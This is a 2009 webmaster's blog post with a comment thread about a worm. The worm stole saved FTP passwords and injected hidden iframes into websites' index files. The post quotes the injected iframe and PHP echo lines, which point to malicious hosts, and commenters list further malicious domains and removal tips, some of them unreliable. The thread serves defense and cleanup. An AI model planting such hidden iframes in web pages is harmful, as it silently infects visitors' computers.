I use Opera!

iFrame worms: goooogleadsence.biz, cutlot.cn, google-ana1yticz.com, mixante.cn and similar

As you noticed we got infection 2 days ago on our site. I manage to clean it in record time for maybe 20 min. However I got few of my others sites infected heavily. So I need to bring back backup for them and in this moment some of them are still offline… Those who are interested it was some variant of iframe worm. It infected all index.php, .html files and few others too. Basically it replaced your </body> in every index file on server with the following code:

<iframe src=”http://cutlot.cn/in.cgi?income49″ width=1 height=1 style=”visibility: hidden”></iframe>
</body>

Or if php index is in question then it’s added with echo.

echo “<iframe src=\”http://goooogleadsence.biz/?click=B16BFB\” width=1 height=1 style=\”visibility:hidden;position:absolute\”></iframe>”;

In some other case link in iframe can be: http://goooogleadsence.biz/?click=B16BFB or http://google-ana1yticz.com/?click=38951B or http://mixante.cn/in.cgi?income52. But people reacted fast, and it look both domains googleadsence.biz and google-analytics.com are down.

Firstly I thought I have server security breach, and then I realized that this thing is fucking my sites from my own computer. This worm infects your computer and then watch for FTP connection and your username and password. When it gets it, it starts to infect all index file you have right as user to write. Also I am not sure does it watch for typed in passwords.

What I did to remove it:

I restarted my windows in safe mode and run nod32 full scan and cleaned few strange tmp files. Then I booted to my Mandriva and changed all control panel and ftp passwords for all my infected sites (I still need to change database passwords). Changed all crucial passwords from Gmail, Godaddy, Moniker! Passwords that are important to me. There is no chance to change passwords for all forums and sites that I am registered to :( . After password changes I recovered my last active public_html backups.

For those sites for which I don’t have backup I opened every index.html and removed code manually. In wordpress sites worm will also infect the default-filters.php and maybe few other files.

I run Clam Antivirus from my cpanel (this depends by hosting) and it detected all infected files, then I wrote down that list and as I said manually removed the malicious code. Be aware that Clam can not clean files just delete them. You can also if wordpress or other cms is in problems, download the clean copy and overwrite all files. Also it looks that

That is what I did. I am not sure will this thing came back, neither will this text help you.

This worm is very dangerous for webmasters because if you don’t react immediately you can be listed by Google as “This site can harm your computer”. If that happened it will ruin your traffic in a second.

No related posts.

Posted in Uncategorized — Hellas @ 7:33 am @ April 10, 2009

45 Comments »

  1. [...] is my article about this pest hope it will get some traffic iFrame worms: goooogleadsence.biz, cutlot.cn, google-ana1yticz.com, mixante.cn and similar | Sulumit… __________________ Evil Science :: Sanovnik :: Sulumits [...]

    Pingback by Net Builders SEO Contest - Page 64 - Net Builders — April 10, 2009 @ 7:37 am

  2. they are using MD5 now and generating javascript code instead of using these simple codes

    some of new them which are still in my servers are :

    xtrarobotz .com
    live-counter .net
    hyperliteautoservices .cn
    namebuypicture .cn
    superbetfair .cn

    and what i find out it that they mainly attacking on FTP applications.

    Comment by sagbee — April 10, 2009 @ 8:22 am

  3. I’m also infected, all my websites have the iframe and link to mixante.cn

    Thanks for this fnformation.

    Comment by Eric — April 10, 2009 @ 2:19 pm

  4. Thanks Sagbee. This is becoming real threat. Does anyone know how to confirm 100% that our pc is clear and safe? I am scared to login to my sites from windows again?

    Comment by admin — April 10, 2009 @ 6:24 pm

  5. Make sure to keep update your antivirus + antispyware!!!

    and regarding to 100% sure, i still don’t get it but find out the thing is IF YOU ever leave any code behind there in between 12 hours, they will inject it again and will start with new iframe worms.

    In wordpress check some wpau-backup folder or maybe delete it and in your wp-theme check every file since every theme have some custom things…

    be sure and be very sure to let delete every these shit iframe links plus find another bug which start from “”" if(!function_exists “”"”

    Delete that one too…

    use SFTP, if you guys know about it

    and guys, if you find anything new, update it, its such a big pain in ass if you have more then 300 websites and you have to do all thing with manually…

    Anyway, i got one more lotmachinesguide .cn

    Thanks
    /sagbee

    Comment by Sagbee — April 10, 2009 @ 8:42 pm

  6. ehha got bugs in wp-config and wp-config-sample.php too

    Comment by sagbee — April 10, 2009 @ 9:24 pm

  7. Argh. I just got it on some of my sites to, sites that I did not used for ages. Can it be server problem. My computer is clean. What if root user got infected pc?

    Comment by Prophet — April 11, 2009 @ 8:29 pm

  8. here are the files which got infected on wordpress platform

    public_html/index.php
    public_html/wp-includes/default-filters.php
    public_html/wp-content/index.php
    public_html/wp-content/themes/THEMEFOLDER/index.php
    public_html/wp-admin/index.php
    public_html/wp-admin/index-extra.php

    Exploit.HTML.IFrame-6

    Comment by Hellas — April 11, 2009 @ 9:19 pm

  9. Ok thanks for the information lol can i know on which sites the are majority of them are present

    Comment by Balaji — April 12, 2009 @ 8:11 am

  10. I Also Found This Virus In My Web Site Please Give Me The Solution For How To Remove This Virus This Is My Site http://www.dhyansanjivani.com Email Me : ravi_hhh50@hotmail.com My Contact No ( 91 9892745771

    Comment by Ravi Singh — April 12, 2009 @ 6:59 pm

  11. There is the viruse Trojan-Downloader.JS.Agent
    It looks in the registry of windows for the location of the file wcx_ftp.ini
    That file (from Total Commander / Windows Commander) stores the FTPs (hosts/users/passwords).
    The passwords can be easy decrypted and from this point on you can have access to that FTP. In the case the FTP is accesible from anywhere (no IP restriction) then at some point you might get the files index*.html, index*.php, default.asp altered (with that iframe thing in it).

    The best advice is to:
    1. clean your pc;
    2. change the ftp passwords;
    3. search and remove all the iframes from your files (from the server).

    Good Luck !

    Comment by Tom — April 13, 2009 @ 7:37 pm

  12. We got this problem too. I never use total commander, i use filezilla instead. Is it posible they hacked this too?

    Comment by teun — April 14, 2009 @ 1:44 pm

  13. Yes tt looks filezilla is hacked too. So as WS FTP LE on my PC.

    Comment by admin — April 14, 2009 @ 3:37 pm

  14. I had this problem too. My computer was infeted with 2 days before NOD32 added to his database this type of worm.
    After manually cleaned a site made in joomla, and my fingers bled from all those index.html files in absolutely every directory I discovered that the infected computer had a lot more ftp addresses stored and every single one of them was infected and then I made a script to do this cleaning for me.
    I’ve made this script just for the types of iframe that appeared in my files.
    here you can find the php file.
    it is renamed .php1 because a wasn’t allowed to upload php files.
    Copy the file in the root of your website and just run it from a browser.
    It isn’t to much of a script but it does his job.
    If you have another kind of iframes feel free to modify my code without any restrictions.
    Here is the link.
    http://rapidshare.com/files/221271583/clean.php1.html
    I hope it will help you

    Comment by Dragos — April 14, 2009 @ 4:40 pm

  15. Unbolivable! Thank you so much for this peace of code. You saved my life! But I must say notice. If someone put wrong worm code in your script it will ruin his whole site. I just deleted content from one of my site with this :D lucky enough I had backup. All guys test the right code offline then when it works upload it on server and run it!

    Once more Thanks DRAGIS
    you saved my day!

    Comment by Creep Boy — April 14, 2009 @ 6:03 pm

  16. Can you update this iframe trojan removal tool with simple graphical interface.

    So we can enter the iframe code it needs to remove from our .php and .html sites?

    Comment by Creep Boy — April 14, 2009 @ 6:06 pm

  17. uhmm @ dragos, seem likes rapidshare limit is already reached… can anyone send me another download links ?

    Thanks

    Comment by Sagbee — April 15, 2009 @ 7:07 am

  18. hello,
    I had this problem. On every index on my site iframe code. I have cleaned it manually and scaned my PC – infection was found in opera cache and deleted. HAha, I think that Im winner. I didnt change pasw on FTP also. The infection came again…
    Now, indexes are clened, my PC and FTP files of affiliate syst. scaned and clean, pasw on FTP still old. NOD alerts infection again but I dont know where the trojan is. I have on same FTP mainweb, affiliate system (warning is on few subdomains urls)and eshop (quickcart). I have no solution

    Comment by jurass — April 15, 2009 @ 6:24 pm

  19. RE: “then I realized that this thing is fucking my sites from my own computer”

    I think this is an incorrect assumption.

    I have not FTPd into my sites for about 6 months yet just found this IFRAME added to every index.html on the site. It updated the pages on April 9 at 6:00am.

    Could be they somehow managed to hack PHP on the server side? It definitely looks like a server-side hack.

    Comment by JoeGaggs — April 16, 2009 @ 9:06 am

  20. The sequence of events is apparently this:

    1) Server is hacked and index.html files are updated.

    2) Users visit site and load index.html which downloads a malicious SWF and PDF file.

    3) The PDF and SWF files hold the malware/virus.

    Comment by JoeGaggs — April 16, 2009 @ 9:09 am

  21. If it is server side hack, why all sites on my server are not hacked, just mine?

    Comment by admin — April 16, 2009 @ 10:08 am

  22. Hey, i can suggest http://www.hackalert24.com for such cases!
    I also had the same problem, more times – my website was hacked. Javascript code, which included a virus from a chinese webserver with an iframe. In one case my provider didn’t hv a clean backup, so it was a lot of work to remove the infections :(
    I use the hackalert hack monitoring service now some weeks ago, and i can’t tell u how secure i’m feeling now.

    Comment by Leo — April 16, 2009 @ 12:42 pm

  23. Anyone tried that hackalert24 site?

    Comment by John — April 16, 2009 @ 9:39 pm

  24. [...] google-ana1yticz.com, mixante.cn worms. You can read my problems with this worms in one of my previous posts, also there is bunch of useful comments there… My server antivirus detects them all as [...]

    Pingback by iframe worms: xtrarobotz.com, superbetfair.cn, lotmachinesguide.cn | Sulumits Retsambew — April 18, 2009 @ 1:42 pm

  25. I just posted new article with the removal tools by Dragos here

    http://www.sulumitsretsambew.org/iframe-worms-xtrarobotzcom-superbetfaircn-lotmachinesguidecn/

    Comment by admin — April 18, 2009 @ 1:54 pm

  26. [...] is the new variant of the iframe virus check it here iFrame worms: goooogleadsence.biz, cutlot.cn, google-ana1yticz.com, mixante.cn and similar | Sulumit… iframe worms: xtrarobotz.com, superbetfair.cn, lotmachinesguide.cn | Sulumits Retsambew and [...]

    Pingback by Wierd, brand new proxy site iframed on some random site - Net Builders — April 19, 2009 @ 7:38 am

  27. I asked frineds to come register on my site and two days later, we’ve all got web0scabies. I am so embarrassed. the hidden iframe first went to IP address, and I cleaned that up, 17 domains on two hosts, desktop and laptop seemed clean. Til 15 hours later when friend alerted me her spybot got Hupigon13 (trojan) and Zlob.Downloader (malware) so far. I found a new hidden iframe, this time going to a litecartop.cn address. The url isn’t popping up on searches as one fo the known nasties yet, but i’m sure it will, it follows the pattern with word income and digits in the url.

    anyway, now.. how do I only see the iframe tag, but my viewing members somehow get things downloading? What should I tell my members to look for?

    Comment by embarrassed — April 22, 2009 @ 7:33 am

  28. Many of my blogs were infected, including WordPress, Joomla, Drupal, Gallery and even a static site.

    I use CuteFTP. But I had not logged into my account for a really long time. My webhost said this was caused due to insecure plugins or old backup copies of wordpress. That could be the cause of the problem. My computer has NOD32 and is regularly updated. It is unlikely I’d get a virus…

    Anyways, here is the code injected into my index files…

    [code]'
    <?php
    /* Short and sweet */
    define('WP_USE_THEMES', true);
    require('./blog/wp-blog-header.php');

    echo "";

    echo "";

    echo "";
    ?>

    '[\code]

    I'm gonna reinstall wordpress. That is the only way out.

    Comment by Gauhar — April 23, 2009 @ 12:54 pm

  29. For all of those thinking that their antivirus is great and that they could not have been hacked… Think again. I just spent a week changing passwords and cleaning files for over 150 web sites on 13 servers. The infection came from a .pdf file that uses a vulnerability in acrobat. (Adobe has released an update to fix this – Also Microsoft has recently released a patch as well.) Even with AV on the system, it is too late once you open the .pdf file. It went through every connection in my CuteFTP Pro. The only way to prevent this is to not use an automatic login. Type in the password each time you have to FTP. This thing is nasty – even after cleaning my system, the virus hid itself within the windows stack processes and reinfected me 36 hours later. I’ve been cleaning viruses on clients computers for the last 12 years. Never seen one that I could not fully remove. The only way I knew it was still there was I could not do a final windows update. The only resolution is a flat install of windows (Format the hard drive – I purchased a new hard drive just to make sure) Good luck, but know it is a nasty virus.

    Comment by Aynonmous — April 24, 2009 @ 5:47 am

  30. One more attack on my websites. This time its different…

    94.247.2.195/jquery.js threat JS/Exploit.Agent.AGR trojan

    I can’t find it… Now what do I do?

    Comment by Gauhar — April 24, 2009 @ 11:59 am

  31. bigtopliteworld.cn/index.php

    a new fuckin virus!It attacked my site recently and my index.php removed and need to upload it again!

    Comment by Virgil — April 25, 2009 @ 1:15 am

  32. There must be some universal cure to stop this threats.

    Comment by admin — April 25, 2009 @ 8:53 am

  33. there is one more solution to prevent all this is to change the permission from 755 to 444 thats way, nothing will be execute from your index page. atleast its works for wordpress platform…

    Comment by sagbee — April 25, 2009 @ 10:54 am

  34. sagbee… thats can be tried. I’ll see if it produces any negative results in the functionality of wordpress…

    Comment by Gauhar — April 27, 2009 @ 9:21 am

  35. thank you all guys. you saved my job!

    Comment by perikle — April 27, 2009 @ 10:13 am

  36. Hey guys,

    I run a server, and unfortunately, it got infected by a virus (iframe)..I really don’t know what I should do, since almost all my websites have been infected, and even the direct admin pages!!!! soo strange!

    please can anyone help me here!

    also, can you please update the rapidshare php cleaner, that link given is broken.

    many thanks guys!

    regards

    Comment by Rahim — May 5, 2009 @ 1:59 pm

  37. check this post
    I uploaded removal tool there

    http://www.sulumitsretsambew.org/iframe-worms-xtrarobotzcom-superbetfaircn-lotmachinesguidecn/

    Comment by admin — May 5, 2009 @ 4:36 pm

  38. I have yet to determine if this is a PC virus or some kind of injection attack at the server, but it definitely uses FTP.
    If you can, set your hosting to only allow FTP access on specific IP addresses or ranges. At least this will prevent use of FTP to do the attack.
    If you use CPanel/WHM and have full access, you can do this. Otherwise you could ask your hosting provider to do so.

    Comment by John — June 13, 2009 @ 9:23 pm

  39. It appears to be a PC virus that will read your FTP login information from various FTP programs like CuteFTP, FileZilla, etc. I added a password to open CuteFTP … Tools > Global Options > Security > Encrypt Site Manager … and haven’t had an issue since. I also upgraded my security on my PC with PC Tools Free Firewall, and added Avast along with AVG to make sure it doesn’t happen again. So far, so good.

    Comment by Tim — June 14, 2009 @ 4:45 pm

  40. I think this post and that one related said all…

    Comment by miklosz — June 14, 2009 @ 4:51 pm

  41. I cleaned up all the files infected in my wordpress…

    The site looked great… 3 days later, got hacked again (definately not server side, I had made the necessary changes, the used ftp from filezilla for sure).

    just changed FTP and cleaned files.

    All looks good, except:

    I log in to my admin in Wordpress and only the “tools” appears in the nav. Can’t write or edit posts. Just dissappeared.

    went in through PHPmyAdmin to see if user still had admin access… apparently it does.

    Made sure all wp-admin files were not infected, basically replaced them with a brand new wordpress download (same version 2.8), and still cannot access any other actions in dashboard logged in as admin other than “tools”.

    Anyone think they know what the issue is? I need help :P

    Thx!

    Comment by oggy — June 19, 2009 @ 3:41 am

  42. Hmm I had the similar issue, but overwriting all wordpress files with newer ones fixed the thing.

    Comment by admin — June 19, 2009 @ 8:02 am

  43. Here is a great article on how to get rid of this virus
    http://www.qualitycodes.com/tutorial.php?articleid=29

    Comment by Mat — August 6, 2009 @ 6:03 pm

  44. Similar issue… I use the tool Iframe.Attack to remove injection :

    http://kawablog.com/scarabox/product.php?id_produit=1&id_rub=2&lng=en

    Demo on youtube :
    http://www.youtube.com/watch?v=XosRuSk_NFg

    regards, Sam

    Comment by Sam — October 11, 2009 @ 11:08 am

  45. Hmm I had the similar issue, but overwriting all wordpress files with newer ones fixed the thing.

    Comment by glass machinery — February 22, 2010 @ 9:29 am

RSS feed for comments on this post. TrackBack URI

Leave a comment